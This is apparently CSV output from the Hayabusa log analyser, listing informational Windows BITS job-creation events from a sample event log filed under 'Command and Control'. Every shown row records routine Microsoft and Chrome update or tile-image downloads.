2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
